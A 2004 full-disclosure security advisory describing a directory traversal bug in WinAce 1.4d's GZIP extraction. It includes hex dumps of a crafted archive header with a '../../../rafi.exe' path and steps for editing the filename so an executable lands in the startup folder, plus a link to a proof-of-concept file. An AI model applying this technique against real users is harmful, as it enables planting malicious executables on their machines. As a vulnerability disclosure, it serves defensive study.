Application:    WinAce
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            GZIP File Directory Transversal
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@mail.com
Website:        http://theinsider.deep-ice.com

1) Introduction
2) Bugs
3) The Code

===============
1) Introduction
===============

WinAce is a file archiever which supports: CAB, JAR, ZIP, RAR, TAR, GZ,
TAR.GZ, LZA, LHA compressions.

======
2) Bug

This is a normal GZIP compressed file header

00000000 1F8B 0808 DC89 9641 0000 7769 6E33 322D …A…win32-
00000010 7368 656C 6C63 6F64 652E 7064 6600 BCBC shellcode.pdf…
00000020 073C 95FF FB3F 5E66 227B 671C 2487 749C .<…?^f"{g.$.t.
00000030 7D8E 5956 F626 23C9 96BD B790 BD77 F6C8 }.YV.&#…w…
00000040 2622 2264 9411 2111 45F6 5656 4684 28FF &""d…!.E.VVF.(.

in the following code, we can see how easy it is to change the path
to anywhere we want, including the all users start up folder.
I just overwrited the original long file name to /…/…/sp5.exe

00000000 1F8B 0808 CE7D A441 0000 2E2E 2F2E 2E2F …}.A…/…/
00000010 2E2E 2F2E 2E2F 2E2E 2F72 6166 692E 6578 …/…/…/rafi.ex
00000020 6500 B329 4E2E CA2C 2849 B34B CC49 2D2A e…)N…,(I.K.I-*
00000030 D1D0 B4D1 8708 D8F1 7201 0045 5910 EA1B …r…EY…
00000040 0000 00 …

All we need to do is GZIP compress (using winace)
a file with a long name/path and change the path specified inside the file
to whatever we want Using any Hex editor such as HexWorkshop, just add
anything to the filename.

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.deep-ice.com/winace gz file transversal.gz

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html